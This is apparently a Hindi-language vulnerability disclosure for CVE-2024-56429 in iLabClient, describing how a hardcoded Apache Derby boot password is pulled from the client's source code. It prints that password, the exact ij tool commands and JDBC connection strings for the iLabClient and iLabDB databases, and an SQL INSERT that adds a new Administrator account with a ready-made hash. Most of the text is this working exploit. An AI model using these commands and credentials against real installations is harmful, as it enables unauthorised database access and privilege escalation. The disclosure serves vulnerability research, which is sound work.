
CVE-2024-56429 के लिए एक्सप्लॉइट जो iLabClient स्रोत कोड से Apache Derby डेटाबेस बूट पासवर्ड निकालने का प्रदर्शन करता है, जिससे स्थानीय डेटाबेस कनेक्शन और उपयोगकर्ता हेरफेर के माध्यम से विशेषाधिकार वृद्धि सक्षम होती है।
iLabClient के स्थानीय डेटाबेस तक पहुँच
iLabClient स्थानीय रूप से आवश्यक डेटा को संग्रहीत करने के लिए Apache Derby डेटाबेस का उपयोग करता है। एन्क्रिप्शन सुनिश्चित करने के लिए, निर्माण के लिए एक bootPassword का उपयोग किया जाता है, जिसे स्रोत कोड से निकाला जा सकता है (निकाला गया कोड DecyptedBootPassword.java में है)। निकाले गए स्रोत कोड को निष्पादित करने के बाद उपयोगकर्ता को bootPassword प्राप्त होता है।
jdbc:derby:iLabClient;dataEncryption=true;bootPassword=YngAYdgAE/kKZYu2F2wm6w==
iLabClient को पहली बार शुरू करने पर दो स्थानीय डेटाबेस iLabCLient और iLabDB बनाए जाते हैं। इन डेटाबेस से कनेक्ट करने के लिए Apache Derby से ij टूल का उपयोग किया जा सकता है, डाउनलोड करें।
ij प्रारंभ करना:
"C:\ilabClient\java8u422\bin\java.exe" -jar "...\db-derby-10.14.2.0-lib\lib\derbyrun.jar" ij
"C:\ilabClient\java8u422\bin\java.exe": iLabClient से इंस्टॉल और उपयोग किया गया Java संस्करण
"...\db-derby-10.14.2.0-lib\lib\derbyrun.jar": Apache Derby लाइब्रेरी
डेटाबेस से कनेक्ट करें:
cd "C:\ilabClient\db
connect 'jdbc:derby:iLabClient;dataEncryption=true;bootPassword=YngAYdgAE/kKZYu2F2wm6w==';
connect 'jdbc:derby:iLabDB;dataEncryption=true;bootPassword=YngAYdgAE/kKZYu2F2wm6w==';
एक बार कनेक्शन स्थापित हो जाने के बाद, डेटा को पढ़ा और उसमें हेरफेर किया जा सकता है। उदाहरण के लिए, अधिक अधिकारों वाला एक और उपयोगकर्ता जोड़कर।
insert into users (USERID, BENUTZER, NAME, PARAMS, HASH) values (4, 'admin2', 'Administrator', '111111111111111111', 'SHA-256:B6382EC801B1BBD5C464C6A5F9C8CFFDC603A7D3A4916B1F50BD592678E8380B');
आवश्यक हैश को GenerateUserData.java क्लास के साथ बनाया जा सकता है।
खोजकर्ता: Lisa Ulbrich (Lufthansa Industry Solutions AS GmbH)